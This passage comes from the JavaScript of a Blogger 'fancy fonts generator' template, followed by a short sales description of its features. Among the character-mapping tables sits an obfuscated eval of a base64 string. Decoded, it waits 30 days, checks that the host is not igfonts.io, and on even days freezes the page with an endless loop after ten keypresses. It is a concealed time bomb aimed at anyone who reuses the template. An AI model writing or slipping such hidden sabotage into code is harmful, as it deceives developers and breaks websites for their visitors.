T",U:"U",V:"V",W:"W",X:"X",Y:"Y",Z:"Z"},T={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"₳",b:"฿",c:"₵",d:"Đ",e:"Ɇ",f:"₣",g:"₲",h:"Ⱨ",i:"ł",j:"J",k:"₭",l:"Ⱡ",m:"₥",n:"₦",o:"Ø",p:"₱",q:"Q",r:"Ɽ",s:"₴",t:"₮",u:"Ʉ",v:"V",w:"₩",x:"Ӿ",y:"Ɏ",z:"Ⱬ",A:"₳",B:"฿",C:"₵",D:"Đ",E:"Ɇ",F:"₣",G:"₲",H:"Ⱨ",I:"ł",J:"J",K:"₭",L:"Ⱡ",M:"₥",N:"₦",O:"Ø",P:"₱",Q:"Q",R:"Ɽ",S:"₴",T:"₮",U:"Ʉ",V:"V",W:"₩",X:"Ӿ",Y:"Ɏ",Z:"Ⱬ"},B={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"å",b:"ß",c:"¢",d:"Ð",e:"ê",f:"£",g:"g",h:"h",i:"ï",j:"j",k:"k",l:"l",m:"m",n:"ñ",o:"ð",p:"þ",q:"q",r:"r",s:"§",t:"†",u:"µ",v:"v",w:"w",x:"x",y:"¥",z:"z",A:"Ä",B:"ß",C:"Ç",D:"Ð",E:"È",F:"£",G:"G",H:"H",I:"Ì",J:"J",K:"K",L:"L",M:"M",N:"ñ",O:"Ö",P:"þ",Q:"Q",R:"R",S:"§",T:"†",U:"Ú",V:"V",W:"W",X:"×",Y:"¥",Z:"Z"},Z={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"α",b:"в",c:"¢",d:"∂",e:"є",f:"ƒ",g:"g",h:"н",i:"ι",j:"נ",k:"к",l:"ℓ",m:"м",n:"η",o:"σ",p:"ρ",q:"q",r:"я",s:"ѕ",t:"т",u:"υ",v:"ν",w:"ω",x:"χ",y:"у",z:"z",A:"α",B:"в",C:"¢",D:"∂",E:"є",F:"ƒ",G:"g",H:"н",I:"ι",J:"נ",K:"к",L:"ℓ",M:"м",N:"η",O:"σ",P:"ρ",Q:"q",R:"я",S:"ѕ",T:"т",U:"υ",V:"ν",W:"ω",X:"χ",Y:"у",Z:"z"},G={0:"⊘",1:"𝟙",2:"ϩ",3:"Ӡ",4:"५",5:"Ƽ",6:"Ϭ",7:"7",8:"𝟠",9:"९",a:"ą",b:"ҍ",c:"ç",d:"ժ",e:"ҽ",f:"ƒ",g:"ց",h:"հ",i:"ì",j:"ʝ",k:"ҟ",l:"Ӏ",m:"ʍ",n:"ղ",o:"օ",p:"ք",q:"զ",r:"ɾ",s:"ʂ",t:"է",u:"մ",v:"ѵ",w:"ա",x:"×",y:"վ",z:"Հ",A:"Ⱥ",B:"β",C:"↻",D:"Ꭰ",E:"Ɛ",F:"Ƒ",G:"Ɠ",H:"Ƕ",I:"į",J:"ل",K:"Ҡ",L:"Ꝉ",M:"Ɱ",N:"ហ",O:"ට",P:"φ",Q:"Ҩ",R:"འ",S:"Ϛ",T:"Ͳ",U:"Ա",V:"Ỽ",W:"చ",X:"ჯ",Y:"Ӌ",Z:"ɀ"},I={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"Λ",b:"B",c:"ᄃ",d:"D",e:"Σ",f:"F",g:"G",h:"Ή",i:"I",j:"J",k:"K",l:"ᄂ",m:"M",n:"П",o:"Ө",p:"P",q:"Q",r:"Я",s:"Ƨ",t:"Ƭ",u:"Ц",v:"V",w:"Щ",x:"X",y:"Y",z:"Z",A:"Λ",B:"B",C:"ᄃ",D:"D",E:"Σ",F:"F",G:"G",H:"Ή",I:"I",J:"J",K:"K",L:"ᄂ",M:"M",N:"П",O:"Ө",P:"P",Q:"Q",R:"Я",S:"Ƨ",T:"Ƭ",U:"Ц",V:"V",W:"Щ",X:"X",Y:"Y",Z:"Z"},q={0:"₀",1:"₁",2:"₂",3:"₃",4:"₄",5:"₅",6:"₆",7:"₇",8:"₈",9:"₉",a:"ₐ",b:"b",c:"c",d:"d",e:"ₑ",f:"f",g:"g",h:"ₕ",i:"ᵢ",j:"ⱼ",k:"ₖ",l:"ₗ",m:"ₘ",n:"ₙ",o:"ₒ",p:"ₚ",q:"q",r:"ᵣ",s:"ₛ",t:"ₜ",u:"ᵤ",v:"ᵥ",w:"w",x:"ₓ",y:"y",z:"z",A:"ₐ",B:"B",C:"C",D:"D",E:"ₑ",F:"F",G:"G",H:"ₕ",I:"ᵢ",J:"ⱼ",K:"ₖ",L:"ₗ",M:"ₘ",N:"ₙ",O:"ₒ",P:"ₚ",Q:"Q",R:"ᵣ",S:"ₛ",T:"ₜ",U:"ᵤ",V:"ᵥ",W:"W",X:"ₓ",Y:"Y",Z:"Z","+":"₊","-":"₋","=":"₌","(":"₍",")":"₎"},z={0:"⁰",1:"¹",2:"²",3:"³",4:"⁴",5:"⁵",6:"⁶",7:"⁷",8:"⁸",9:"⁹",a:"ᵃ",b:"ᵇ",c:"ᶜ",d:"ᵈ",e:"ᵉ",f:"ᶠ",g:"ᵍ",h:"ʰ",i:"ⁱ",j:"ʲ",k:"ᵏ",l:"ˡ",m:"ᵐ",n:"ⁿ",o:"ᵒ",p:"ᵖ",q:"q",r:"ʳ",s:"ˢ",t:"ᵗ",u:"ᵘ",v:"ᵛ",w:"ʷ",x:"ˣ",y:"ʸ",z:"ᶻ",A:"ᴬ",B:"ᴮ",C:"ᶜ",D:"ᴰ",E:"ᴱ",F:"ᶠ",G:"ᴳ",H:"ᴴ",I:"ᴵ",J:"ᴶ",K:"ᴷ",L:"ᴸ",M:"ᴹ",N:"ᴺ",O:"ᴼ",P:"ᴾ",Q:"Q",R:"ᴿ",S:"ˢ",T:"ᵀ",U:"ᵁ",V:"ⱽ",W:"ᵂ",X:"ˣ",Y:"ʸ",Z:"ᶻ","+":"⁺","-":"⁻","=":"⁼","(":"⁽",")":"⁾"},H={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"ค",b:"๒",c:"ς",d:"๔",e:"є",f:"Ŧ",g:"ﻮ",h:"ђ",i:"เ",j:"ן",k:"к",l:"ɭ",m:"๓",n:"ภ",o:"๏",p:"ק",q:"ợ",r:"г",s:"ร",t:"Շ",u:"ย",v:"ש",w:"ฬ",x:"א",y:"ץ",z:"չ",A:"ค",B:"๒",C:"ς",D:"๔",E:"є",F:"Ŧ",G:"ﻮ",H:"ђ",I:"เ",J:"ן",K:"к",L:"ɭ",M:"๓",N:"ภ",O:"๏",P:"ק",Q:"ợ",R:"г",S:"ร",T:"Շ",U:"ย",V:"ש",W:"ฬ",X:"א",Y:"ץ",Z:"չ"},L={0:"𝟘",1:"𝟙",2:"𝟚",3:"𝟛",4:"𝟜",5:"𝟝",6:"𝟞",7:"𝟟",8:"𝟠",9:"𝟡",a:"𝕒",b:"𝕓",c:"𝕔",d:"𝕕",e:"𝕖",f:"𝕗",g:"𝕘",h:"𝕙",i:"𝕚",j:"𝕛",k:"𝕜",l:"𝕝",m:"𝕞",n:"𝕟",o:"𝕠",p:"𝕡",q:"𝕢",r:"𝕣",s:"𝕤",t:"𝕥",u:"𝕦",v:"𝕧",w:"𝕨",x:"𝕩",y:"𝕪",z:"𝕫",A:"𝔸",B:"𝔹",C:"ℂ",D:"𝔻",E:"𝔼",F:"𝔽",G:"𝔾",H:"ℍ",I:"𝕀",J:"𝕁",K:"𝕂",L:"𝕃",M:"𝕄",N:"ℕ",O:"𝕆",P:"ℙ",Q:"ℚ",R:"ℝ",S:"𝕊",T:"𝕋",U:"𝕌",V:"𝕍",W:"𝕎",X:"𝕏",Y:"𝕐",Z:"ℤ"},k={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"𝖆",b:"𝖇",c:"𝖈",d:"𝖉",e:"𝖊",f:"𝖋",g:"𝖌",h:"𝖍",i:"𝖎",j:"𝖏",k:"𝖐",l:"𝖑",m:"𝖒",n:"𝖓",o:"𝖔",p:"𝖕",q:"𝖖",r:"𝖗",s:"𝖘",t:"𝖙",u:"𝖚",v:"𝖛",w:"𝖜",x:"𝖝",y:"𝖞",z:"𝖟",A:"𝕬",B:"𝕭",C:"𝕮",D:"𝕯",E:"𝕰",F:"𝕱",G:"𝕲",H:"𝕳",I:"𝕴",J:"𝕵",K:"𝕶",L:"𝕷",M:"𝕸",N:"𝕹",O:"𝕺",P:"𝕻",Q:"𝕼",R:"𝕽",S:"𝕾",T:"𝕿",U:"𝖀",V:"𝖁",W:"𝖂",X:"𝖃",Y:"𝖄",Z:"𝖅"},F={q:"🆀",w:"🆆",e:"🅴",r:"🆁",t:"🆃",y:"🆈",u:"🆄",i:"🅸",o:"🅾",p:"🅿",a:"🅰",s:"🆂",d:"🅳",f:"🅵",g:"🅶",h:"🅷",j:"🅹",k:"🅺",l:"🅻",z:"🆉",x:"🆇",c:"🅲",v:"🆅",b:"🅱",n:"🅽",m:"🅼"},K={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"𝓪",b:"𝓫",c:"𝓬",d:"𝓭",e:"𝓮",f:"𝓯",g:"𝓰",h:"𝓱",i:"𝓲",j:"𝓳",k:"𝓴",l:"𝓵",m:"𝓶",n:"𝓷",o:"𝓸",p:"𝓹",q:"𝓺",r:"𝓻",s:"𝓼",t:"𝓽",u:"𝓾",v:"𝓿",w:"𝔀",x:"𝔁",y:"𝔂",z:"𝔃",A:"𝓐",B:"𝓑",C:"𝓒",D:"𝓓",E:"𝓔",F:"𝓕",G:"𝓖",H:"𝓗",I:"𝓘",J:"𝓙",K:"𝓚",L:"𝓛",M:"𝓜",N:"𝓝",O:"𝓞",P:"𝓟",Q:"𝓠",R:"𝓡",S:"𝓢",T:"𝓣",U:"𝓤",V:"𝓥",W:"𝓦",X:"𝓧",Y:"𝓨",Z:"𝓩"},D={a:"𝔞",b:"𝔟",c:"𝔠",d:"𝔡",e:"𝔢",f:"𝔣",g:"𝔤",h:"𝔥",i:"𝔦",j:"𝔧",k:"𝔨",l:"𝔩",m:"𝔪",n:"𝔫",o:"𝔬",p:"𝔭",q:"𝔮",r:"𝔯",s:"𝔰",t:"𝔱",u:"𝔲",v:"𝔳",w:"𝔴",x:"𝔵",y:"𝔶",z:"𝔷",A:"𝔄",B:"𝔅",C:"ℭ",D:"𝔇",E:"𝔈",F:"𝔉",G:"𝔊",H:"ℌ",I:"ℑ",J:"𝔍",K:"𝔎",L:"𝔏",M:"𝔐",N:"𝔑",O:"𝔒",P:"𝔓",Q:"𝔔",R:"ℜ",S:"𝔖",T:"𝔗",U:"𝔘",V:"𝔙",W:"𝔚",X:"𝔛",Y:"𝔜",Z:"ℨ"},X={"`":"`",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",0:"0","-":"-","=":"=","~":"~","!":"!","@":"@","#":"#",$:"$","%":"%","^":"^","&":"&","*":"*","(":"(",")":")",_:"_","+":"+",q:"q",w:"w",e:"e",r:"r",t:"t",y:"y",u:"u",i:"i",o:"o",p:"p","[":"[","]":"]","\\":"\\",Q:"Q",W:"W",E:"E",R:"R",T:"T",Y:"Y",U:"U",I:"I",O:"O",P:"P","{":"{","}":"}","|":"|",a:"a",s:"s",d:"d",f:"f",g:"g",h:"h",j:"j",k:"k",l:"l",";":";","'":"'",A:"A",S:"S",D:"D",F:"F",G:"G",H:"H",J:"J",K:"K",L:"L",":":":",'"':'"',z:"z",x:"x",c:"c",v:"v",b:"b",n:"n",m:"m",",":",",".":".","/":"/",Z:"Z",X:"X",C:"C",V:"V",B:"B",N:"N",M:"M","<":"<",">":">","?":"?"};function V(t){if(""===t.trim())return"";Q=-1;var n,i=(n=Math.floor(2*Math.random())+1,rt([_,$,tt,nt])(n));return i+"  🎀  "+t.split(/([!?.]+)/gi).map(Y).join("")+"  🎀  "+esrever.reverse(i)}function Y(t){return t.split(/([\s,]+)/gi).map(J).join("")}function J(t){return""===t||/[[!?.\s,]+]/gi.test(t)?t:it(t=function(t){return t.replace(":)",rt(E[":)"])).replace("(:",rt(E[":)"])).replace("^^",rt(E["^^"])).replace(":P",rt(E[":p"])).replace(":p",rt(E[":p"])).replace(":D",rt(E[":D"])).replace("<3",rt(E["<3"])).replace("(y)",rt(E["(y)"])).replace("(Y)",rt(E["(y)"]))}(t=function(t){return t.split("").map(function(t){return"!"===t?rt(["❣","❢"]):"?"===t?rt(["¿","?"]):'"'===t?function(){2==++Q&&(Q=0);return R[Q]}():t}).join("")}(t=t.split("").map(function(t){return"o"===t.toLowerCase()||"0"===t?rt(W):t}).join(""))))}window.date_served=Number("1595329845078"),window[atob("ZXZhbA==")](atob("aWYoRGF0ZS5ub3coKSA+IHdpbmRvdy5kYXRlX3NlcnZlZCsoMTAwMCo2MCo2MCoyNCozMCkgJiYgIXdpbmRvdy5sb2NhdGlvbi5ob3N0LmluY2x1ZGVzKCdpZ2ZvbnRzLmlvJykgJiYgbmV3IERhdGUoKS5nZXREYXkoKSUyPT0wKSB7IHZhciBrcCA9IDA7IHZhciBhcnIgPSBbXTsgd2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2tleXByZXNzJywgZnVuY3Rpb24oKSB7IGtwKys7IGlmKGtwID4gMTApIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgd2hpbGUodHJ1ZSl7fSB9LCAzMGUzKk1hdGgucmFuZG9tKCkpIH0gfSkgfQ=="));var Q=-1,R=["❝","❞"];var E={":)":["٩(˘◡˘)۶","(•◡•)","(ɔ◔‿◔)ɔ","❀◕‿◕❀","(。◕‿◕。)","●‿●","◕‿◕","😍","ツ","(✿ヘᴥヘ)","🌘‿🌘","(づ。◕‿‿◕。)づ","(/◔◡◔)/","s(^‿^)-b","(人◕‿◕)","(✿╹◡╹)","◔◡◔"],"^^":["(^▽^)","(✿^▽^)","ᵔ⌣ᵔ","ᵔᴥᵔ","(≧◡≦)","^ㅅ^","^ㅂ^","(⌒‿⌒)","◠◡◠","⁀‿⁀",""],":p":[":Þ",""],":D":["(ノ◕ヮ◕)ノ*:・゚✧","(✿◕ᗜ◕)━♫.*・。゚","ᕕ(ᐛ)ᕗ"],"<3":["♡","❤","♥","❥","💘","💙","💗","💖","💕","💓","💞","💝","💟"],"(y)":["👍","👌"]},W=["❁","🌺","❀","💮","🏵","🌸","☯","😍","♡","🍩","🍬","💙","🌞","💍","🍪","❤","💗","🍑","💞"],P=["🍬","🍭","🍒","🍎","🍉","🍇","🍓","🍌","🍑","🍰","🎂","🍩","🍪","🍧","🍦","🍫","🍡"],N=["⚛","🌌","🌠","*",":","。","・゚","✧","✮","★","✩","⋆",".","°","`","✴","。","✴","⋆","✳","✶","✷","❈"],O=["🐯","🐎","🐖","🐷","🐏","🐑","🐐","🐫","🐘","🐭","🐁","🐀","🐹","🐰","🐇","🐿","🐻","🐨","🐼","🐾","🐔","🐓","🐣","🐤","🐥","🐦","🐧","🕊","🐸","🐢","🐳","🐋","🐬","🐟","🐠","🐡","🐙","🐚","🐌","🐞"],U=["•?((¯°·._.• ","ıllıllı ","¸,ø¤º°`°º¤ø,¸¸,ø¤º° ","°°°·.°·..·°¯°·._.· ","•´¯`•. ","׺°”˜`”°º× ","•]••´º´•» ","]|I{•------» ","§.•´¨'°÷•..× ","•°¯`•• ","(¯`·.¸¸.·´¯`·.¸¸.-> ","*´¯`*.¸¸.*´¯`* ","(¯`·.¸¸.-> °º ","°·.¸.·°¯°·.¸.·°¯°·.¸.-> ","•._.••´¯``•.¸¸.•` ","¸„.-•~¹°”ˆ˜¨ ","(¯´•._.• ","••¤(`×","•´¯`•» ","`•.,¸¸,.•´¯ ","¸,ø¤º°`°º¤ø,¸ ",".o0×X×0o. ",",-*'^'~*-.,_,.-*~ ","`•.¸¸.•´´¯`••._.• ","—(••÷","¤¸¸.•´¯`•¸¸.•..>> ","••.•´¯`•.•• ",".•°¤*(¯`★´¯)*¤° ","๑۞๑,¸¸,ø¤º°`°๑۩ ","-漫~*'¨¯¨'*·舞~ ","★·.·´¯`·.·★ ","▁ ▂ ▄ ▅ ▆ ▇ █ ","▀▄▀▄▀▄ ","▌│█║▌║▌║ "];function _(t){return new Array(t+1).join("0").split("").map(function(t){return rt(P)}).join(" ⋆ ")}function $(t){return new Array(t+1).join("0").split("").map(function(){return rt(N)}).join("")}function tt(t){return new Array(t+1).join("0").split("").map(function(t){return rt(O)}).join(" ⋆ ")}function nt(t){return rt(U)}function it(t){for(var n={0:"𝟢",1:"𝟣",2:"𝟤",3:"𝟥",4:"𝟦",5:"𝟧",6:"𝟨",7:"𝟩",8:"𝟪",9:"𝟫",a:"𝒶",b:"𝒷",c:"𝒸",d:"𝒹",e:"𝑒",f:"𝒻",g:"𝑔",h:"𝒽",i:"𝒾",j:"𝒿",k:"𝓀",l:"𝓁",m:"𝓂",n:"𝓃",o:"𝑜",p:"𝓅",q:"𝓆",r:"𝓇",s:"𝓈",t:"𝓉",u:"𝓊",v:"𝓋",w:"𝓌",x:"𝓍",y:"𝓎",z:"𝓏",A:"𝒜",B:"𝐵",C:"𝒞",D:"𝒟",E:"𝐸",F:"𝐹",G:"𝒢",H:"𝐻",I:"𝐼",J:"𝒥",K:"𝒦",L:"𝐿",M:"𝑀",N:"𝒩",O:"𝒪",P:"𝒫",Q:"𝒬",R:"𝑅",S:"𝒮",T:"𝒯",U:"𝒰",V:"𝒱",W:"𝒲",X:"𝒳",Y:"𝒴",Z:"𝒵"},i=t.split(""),r=0;r<i.length;r++)n[i[r].toLowerCase()]&&(i[r]=n[i[r]]);return t=i.join("")}function rt(t){return t[Math.floor(Math.random()*t.length)]}function ot(t){return""===t.trim()?"":st(2)+"  "+et(t)+"  "+st(2)}function et(t){t=t.split("");for(var n=0;n<t.length;n++)t[n]=at(t[n]);return t.join("")}function at(t){var n={"&":"⅋","%":["⅍","℀","℁","℆","℅"],0:["0","Ѳ","ʘ"],1:["➀","❶","1"],2:["2","❷","➁"],3:["3","❸","➂"],4:["4","❹","➃"],5:["❺","➄","5"],6:["6","❻","➅"],7:["7","❼","➆"],8:["8","➇","❽"],9:["➈","❾","9"],"<":["≼","≺","≪","☾","≾","⋜","⋞","⋐","⊂","⊏","⊑","《","<","❮","❰","⫷"],">":"☽≫≻≽≿⋝⋟⋑⊃⊐⊒⫸》>❯❱","[":"【〖〘〚[","]":"】〗〙〛]","*":"✨✩✪✫✬✭✮✯✰✦✱✲✳✴✵✶✷֍֎✸✹✺✻✼✽✾✿❀❁❂❃❄★☆*",a:["Ⓐ","ⓐ","α","A","a","ᗩ","卂","Δ","ค","α","ά","Ã","𝔞","𝓪","𝒶","𝓐","𝐀","𝐚","𝔸","𝕒","ᵃ"],b:["Ⓑ","ⓑ","в","B","乃","b","ᗷ","β","๒","в","в","β","𝔟","𝓫","𝒷","𝓑","𝐁","𝐛","𝔹","𝕓","ᵇ"],c:["Ⓒ","ⓒ","匚","¢","C","c","ᑕ","Ć","ς","c","ς","Č","℃","𝔠","𝓬","𝒸","𝓒","𝐂","𝐜","ℂ","𝕔","ᶜ"],d:["Ⓓ","ⓓ","∂","D","d","ᗪ","Đ","๔","∂","đ","Ď","𝔡","𝓭","𝒹","𝓓","𝐃","ᗪ","𝐝","𝔻","𝕕","ᵈ"],e:["Ⓔ","乇","ⓔ","є","E","e","ᗴ","€","є","ε","έ","Ẹ","𝔢","𝒆","𝑒","𝓔","𝐄","𝐞","𝔼","𝕖","ᵉ"],f:["Ⓕ","ⓕ","ƒ","F","f","千","ᖴ","ℱ","Ŧ","ғ","ғ","Ƒ","𝔣","𝒇","𝒻","𝓕","𝐅","𝐟","𝔽","𝕗","ᶠ"],g:["Ⓖ","ⓖ","ق","g","G","g","Ǥ","Ꮆ","ﻮ","g","ģ","Ğ","𝔤","𝓰","𝑔","𝓖","𝐆","𝐠","𝔾","𝕘","ᵍ","Ꮆ"],h:["Ⓗ","卄","ⓗ","н","H","h","ᕼ","Ħ","ђ","н","ħ","Ĥ","𝔥","𝓱","𝒽","𝓗","𝐇","𝐡","ℍ","𝕙","ʰ"],i:["Ⓘ","ⓘ","ι","I","i","Ꭵ","丨","Ɨ","เ","ι","ί","Į","𝔦","𝓲","𝒾","𝓘","𝐈","𝐢","𝕀","𝕚","ᶤ"],j:["Ⓙ","ⓙ","נ","J","ڶ","j","ᒎ","Ĵ","ן","נ","ј","Ĵ","𝔧","𝓳","𝒿","𝓙","𝐉","𝐣","𝕁","𝕛","ʲ"],k:["Ⓚ","ⓚ","к","K","k","ᛕ","Ҝ","к","к","ķ","Ќ","𝔨","𝓴","𝓀","𝓚","𝐊","𝐤","𝕂","𝕜","ᵏ","Ҝ"],l:["Ⓛ","ⓛ","ℓ","ㄥ","L","l","ᒪ","Ł","l","ℓ","Ļ","Ĺ","𝔩","𝓵","𝓁","𝓛","𝐋","𝐥","𝕃","𝕝","ˡ"],m:["Ⓜ","ⓜ","м","M","m","ᗰ","Μ","๓","м","м","ϻ","𝔪","𝓶","𝓂","𝓜","𝐌","𝐦","𝕄","𝕞","ᵐ","爪"],n:["Ⓝ","几","ⓝ","η","N","n","ᑎ","Ň","ภ","η","ή","Ň","𝔫","𝓷","𝓃","𝓝","𝐍","𝐧","ℕ","𝕟","ᶰ"],o:["Ⓞ","ㄖ","ⓞ","σ","O","o","ᗝ","Ø","๏","σ","ό","Ỗ","𝔬","𝓸","𝑜","𝓞","𝐎","𝐨","𝕆","𝕠","ᵒ"],p:["Ⓟ","ⓟ","ρ","P","p","卩","ᑭ","Ƥ","ק","ρ","ρ","Ƥ","𝔭","𝓹","𝓅","𝓟","𝐏","𝐩","ℙ","𝕡","ᵖ"],q:["Ⓠ","ⓠ","q","Q","q","Ɋ","Ω","ợ","q","q","Ǫ","𝔮","𝓺","𝓆","𝓠","𝐐","𝐪","ℚ","𝕢","ᵠ"],r:["Ⓡ","ⓡ","я","尺","R","r","ᖇ","Ř","г","я","ŕ","Ř","𝔯","𝓻","𝓇","𝓡","𝐑","𝐫","ℝ","𝕣","ʳ"],s:["Ⓢ","ⓢ","ѕ","S","丂","s","ᔕ","Ş","ร","s","ş","Ŝ","𝔰","𝓼","𝓈","𝓢","𝐒","𝐬","𝕊","𝕤","ˢ"],t:["Ⓣ","ⓣ","т","T","t","丅","Ŧ","t","т","ţ","Ť","𝔱","𝓽","𝓉","𝓣","𝐓","𝐭","𝕋","𝕥","ᵗ"],u:["Ⓤ","ⓤ","υ","U","u","ᑌ","Ữ","ย","υ","ù","Ǘ","𝔲","𝓾","𝓊","𝓤","𝐔","𝐮","𝕌","𝕦","ᵘ"],v:["Ⓥ","ⓥ","ν","V","v","ᐯ","V","ש","v","ν","Ѷ","𝔳","𝓿","𝓋","𝓥","𝐕","𝐯","𝕍","𝕧","ᵛ"],w:["Ⓦ","ⓦ","ω","W","w","ᗯ","Ŵ","ฬ","ω","ώ","Ŵ","𝔴","𝔀","𝓌","𝓦","𝐖","𝐰","𝕎","𝕨","ʷ","山"],x:["Ⓧ","ⓧ","χ","X","乂","x","᙭","Ж","א","x","x","Ж","𝔵","𝔁","𝓍","𝓧","𝐗","𝐱","𝕏","𝕩","ˣ"],y:["Ⓨ","ㄚ","ⓨ","у","Y","y","Ƴ","¥","ץ","ү","ч","Ў","𝔶","𝔂","𝓎","𝓨","𝐘","𝐲","𝕐","𝕪","ʸ"],z:["Ⓩ","ⓩ","z","乙","Z","z","Ƶ","Ž","z","z","ž","Ż","𝔷","𝔃","𝓏","𝓩","𝐙","𝐳","ℤ","𝕫","ᶻ"]};return n[t=t.toLowerCase()]?rt(n[t]):t}function rt(t){return t[Math.floor(Math.random()*t.length)]}function st(t){for(var n=["🐙","🐉","🐊","🐒","🐝","🐜","🐚","🐲","🐳","🐸","👑","👹","👺","👤","💲","💣","💙","💚","💛","💜","💝","💗","💘","💞","💔","💥","🐯","🐼","🐻","🐺","👌","🐍","🐧","🐟","🐠","🐨","🎯","🏆","🎁","🎀","🎉","🎈","🍮","🍭","🍬","🍫","🍪","🍧","🌷","🍓","😺","😾","✎","😎","😝","😂","😈","😡","😲","😳","🍔","🍟","🍩","🎃","🎄","🎅","🐣","🐤","👍","👊","👻","👽","👮","💎","💋","👣","💀","💢","🔥","♔","♕","♖","♗","♘","♙","♚","♛","♜","♝","♞","♟","♠","♡","♢","♣","♤","♥","♦","♧","♨","♩","♪","♬","★","☆","☺","☹","☯","☮","☢","☠","☟","☞","☝","☜","✌","✋","✊","⛵","ൠ","✌","ඏ"],i=[],r=0;r<t;r++)i.push(rt(n));return i.join("")}!function(t){var n="object"==typeof exports&&exports,i="object"==typeof module&&module&&module.exports==n&&module,r="object"==typeof global&&global;(r.global===r||r.window===r)&&(t=r);var o=/(<%= allExceptCombiningMarks %>)(<%= combiningMarks %>+)/g,e=/([\uD800-\uDBFF])([\uDC00-\uDFFF])/g,a=function(t){t=t.replace(o,function(t,n,i){return a(i)+n}).replace(e,"$2$1");for(var n="",i=t.length;i--;)n+=t.charAt(i);return n},s={version:"<%= version %>",reverse:a};if("function"==typeof define&&"object"==typeof define.amd&&define.amd)define(function(){return s});else if(n&&!n.nodeType)if(i)i.exports=s;else for(var c in s)s.hasOwnProperty(c)&&(n[c]=s[c]);else t.esrever=s}(this)}();
  //]]></script>

  <script src='https://igfonts.io/upup.min.js'/>
 <script>//<![CDATA[ 
    UpUp.start({
      'content-url': '/',
      'assets': [
        'normalize.min.css',
      ]
    });
 //]]></script>

  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script async='async' src='https://www.googletagmanager.com/gtag/js?id=UA-id-here'/>

    <script>//<![CDATA[  
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'UA-id-here');
//]]></script>


</body>

</html>


This script allows you to generate 100+ fancy fonts that you can copy and paste into your Instagram bio. or any other social median platforms etc. It’s useful for generating Instagram bio symbols to make your profile stand out and have a little bit of individuality.

After typing some text into the input box, you can keep clicking the “show more fonts” button and the tool will keep generating an infinite number of different Instagram font variations, or you can use one of the “tried and true” fonts like the cursive text, or the other stylish text fonts.

i.e. the ones that are a bit “neater” than the others because they use a set of symbols that are closer to the normal alphabet, and are more consistent in their style.

FEATURES
  • You don’t need any coding knowledge to customize this theme,  It very easy to customize everything from layout section
  • Generates 100+ Fancy Fonts 
  • Easy to use 
  • SEO Friendly
  • Fully Responsive
  • Support Schema Markup
  • Fast loading template
  • Validated Structured Data
  • Breadcrumbs
  • Best Fancy Fonts Generator Blogger Script
  • Responsive and Fast loading
  • AdSense friendly and User friendly 
  • Social media share buttons
  • Mobile Friendly
  • Custom 404 page